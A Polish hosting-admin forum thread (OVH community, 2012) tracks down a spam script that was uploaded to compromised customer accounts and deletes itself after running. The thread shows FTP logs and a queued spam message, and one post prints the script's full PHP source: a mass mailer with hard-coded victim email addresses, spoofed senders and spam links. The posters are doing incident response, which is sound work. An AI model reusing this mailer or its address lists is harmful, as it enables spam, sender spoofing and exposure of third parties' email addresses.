OVH Community, your new community space.

Jakiś skrypt rozsyła SPAM - jak namierzyć ?


Spacedust
30-04-2012, 10:36
Ostatnio zauważyłem też dziwny spam wysyłany niby z konta klienta, ale tak naprawdę to kolejny zombie. W momencie odpowiedzi na takiego maila jako adres do odpowiedzi podawany jest adres klienta, a nie spamera...

mario1973
30-04-2012, 08:11
Cytat Napisał Spacedust
Ja poszedłem dalej i sprawdziłem po IP w RIPE
walka z wiatrakami. Przecież właściciel tego IP też zapewne robił to nieświadomie. Zombie obsługuje kolejne zombie itd....

M

Spacedust
29-04-2012, 20:03
Cytat Napisał mario1973
TAK - na jednym serwerze hostingowym też to zaobserwowałem.

Skompromitowane konta klientów i ktoś ładuje plik , uruchamia i kasuje i tak w kółko

M
Ja poszedłem dalej i sprawdziłem po IP w RIPE do kogo należy to IP i wysłałem na abuse. Okazało się, że to też jakaś firma hostingowa. Gość dostał za swoje

mario1973
29-04-2012, 20:00
TAK - na jednym serwerze hostingowym też to zaobserwowałem.

Skompromitowane konta klientów i ktoś ładuje plik , uruchamia i kasuje i tak w kółko

M

Spacedust
28-04-2012, 22:13
Zbanowałem to IP i święty spokój

Spacedust
28-04-2012, 22:10
Tak wygląda ten skrypt w środku:

error_reporting(0);

$list="king_6@sympatico.ca;s_fletcher@gfistainless .com;karenmald@aol.com;siouxfalls01kr@msn.com;inve stor1288@aol.com;awand3ks@sbcglobal.net;stockupdat e@vmadmin.com;alaguakilan@yahoo.com;biano_2005@yah oo.com;renardmicheld@aol.com;eckssssn72@aol.com;po oter1@cox.net;loonypea@yahoo.com;quintanan@laffsto ck.com;m_harrus@yahoo.com;sma_97@yahoo.com;fullsrv law@aol.com;konkala1958@yahoo.com;wonderland_2006@ hotmail.com;hhalls3@aol.com;mexpro14@yahoo.com;a16 cd@ameritrade.com;pernzassocn@siliconinvestor.com; lisaredmon@ymail.com;iamalsoanelf@gmail.com;go1can es242582@aol.com;jeeips@gmail.com;assoceo@sbcgloba l.net;queendelana@yahoo.com;thx1138007@qwest.net;j immerjammer29@yahoo.com;reneshenry@yahoo.com;jason white252001@yahoo.com;lucy_loo406@sbcglobal.net;ao lteetzs@aol.com;ird473@yahoo.com;pbranson@ymail.co m;eve012@bc.mbn.or.jp;ncarpio@yahoo.com;vincentfed ericojr@yahoo.com;a54@hotmail.com;sheref1782008@ya hoo.com;jpnut420@gmail.com;n6niadd@ameritrade.com; rjrezacdd@ameritrade.com;smayra75@yahoo.com;ssa_em t@hotmail.com;beachbumannie@islc.net;brasilianlove x@aim.com;joandlo@juno.com;";
$list2="lousiegirll@ccc.ca;beau52kr@shamrocksupply .com;podossy@partyprinting.com;veronica.hudson@mai l.cesae.pt;rodsted@memsindustrygroup.org;addled1@a aahockey.com;gmalex@crouse-hinds.com;housepaid4@dansac.jp;jmbjf@devone.org;";
$subj="Don't bury your loving life";
$body="Without night malfunctoon risk http://mockup.mcswebsite.com/pitch.html";

$listm=explode(";",$list);
$list2m=explode(";",$list2);


$k=0;
foreach ($listm as $el)
{
if (strlen($el)>"5")
{
$from_email=rtrim($list2m[rand(0,count($list2m)-2)]);
# echo rtrim($el)." ".$subj." ".$body." From: <".$from_email.">\n";
if (mail(rtrim($el),$subj,$body,"From: <".$from_email.">")) $k++;
}
}
echo $k;
?>

Spacedust
28-04-2012, 22:07
Wszystko na temat, logi FTP:

188.190.98.x - moha1 [28/Apr/2012:23:01:52 +0200] "PUT /home/moha1/branze.test.pl/ffud5ihs.php" 200 20
188.190.98.x - moha1 [28/Apr/2012:23:01:52 +0200] "PUT /home/moha1/branze.test.pl/fdhaj.php" 200 1799
188.190.98.x - lelunia [28/Apr/2012:23:03:48 +0200] "PUT /home/lelunia/bankier.test.pl/e6gc9iq.php" 200 20
188.190.98.x - lelunia [28/Apr/2012:23:03:49 +0200] "PUT /home/lelunia/bankier.test.pl/ef8f4i.php" 200 1901
188.190.98.x - pjlenik [28/Apr/2012:23:04:21 +0200] "PUT /home/pjlenik/test.pl/a4ze3j.php" 200 20
188.190.98.x - pjlenik [28/Apr/2012:23:04:21 +0200] "PUT /home/pjlenik/test.pl/eowln.php" 200 1824
188.190.98.x - syska161 [28/Apr/2012:23:04:23 +0200] "PUT /home/syska161/test.pl/fygrz.php" 200 20
188.190.98.x - syska161 [28/Apr/2012:23:04:24 +0200] "PUT /home/syska161/test.pl/eelpetlo.php" 200 1857
188.190.98.x - moha1 [28/Apr/2012:23:04:28 +0200] "PUT /home/moha1/branze.test.pl/fyxrx.php" 200 20
188.190.98.x - moha1 [28/Apr/2012:23:04:28 +0200] "PUT /home/moha1/branze.test.pl/dzwil.php" 200 1898
Jak klienci nie potrafią zabezpieczyć własnych komputerów...

Spacedust
28-04-2012, 21:56
Namierzyłem to u jednego klienta.

Bardzo wrednie napisany skrypt, w środku wpisane adresy mailowe, pełno kodu i po chwili sam się kasuje i pojawia na innym koncie.

Spacedust
28-04-2012, 21:47
Cytat Napisał hanjin
z php.net
Kod:
mail.add_x_header bool 

 Add X-PHP-Originating-Script that will include UID of the script followed by the filename.
Dlaczego? może więcej userów uwaliło, a te pliki są o takich nazwach? Przeszukaj katalogi tych userów findem.
Nic nie znajduje, albo to się uruchamia i kasuje i za chwilę nowa nazwa i nowy użytkownik. Już mam 3 podejrzanych.

hanjin
28-04-2012, 21:16
z php.net
Kod:
mail.add_x_header bool 

 Add X-PHP-Originating-Script that will include UID of the script followed by the filename.
Dlaczego? może więcej userów uwaliło, a te pliki są o takich nazwach? Przeszukaj katalogi tych userów findem.

Spacedust
28-04-2012, 21:11
Jednak to coś innego, bo teraz mam: 2163:gojrsi4.php

Spacedust
28-04-2012, 20:59
Cytat Napisał hanjin
Kod:
2115:b3r0ay.php
Ja się nie znam ale to nie jest UID usera:skrypt.php? Przeszukiwałeś dysk?

Ja zawsze używam tego: http://choon.net/php-mail-header.php, no ale php kompilować trzeba samemu, w paczkach raczej tego nie uświadczy....
Właśnie robię updatedb.

Te pliki wyglądają na dość logiczne:

2115:f2z1a7g.php
2115:groeel.php

Update: mam klienta o takim ID, przejrzę jego pliki...

hanjin
28-04-2012, 20:54
Kod:
2115:b3r0ay.php
Ja się nie znam ale to nie jest UID usera:skrypt.php? Przeszukiwałeś dysk?

Ja zawsze używam tego: http://choon.net/php-mail-header.php, no ale php kompilować trzeba samemu, w paczkach raczej tego nie uświadczy....

Spacedust
28-04-2012, 20:32
W kolejce poczty (Qmail) mam 64000 maili, wszystkie wysłane do yahoo.com lub aol.com:

--------------
MESSAGE NUMBER 412157
--------------
Received: (qmail 28793 invoked by uid 2115); 28 Apr 2012 15:18:22 -0000
Date: 28 Apr 2012 15:18:22 -0000
Message-ID: <20120428151822.28770.qmail@mail.domena.pl>
To: mmrmf2003@yahoo.com
Subject: Very good technique to improve your loving life
X-PHP-Originating-Script: 2115:b3r0ay.php
From:

http://dursunboran.com/use.html Do you want to satisfy your woman every night?
Jak namierzyć to dziadostwo ? Pewnie znowu jakaś stara Joomla została shakowana...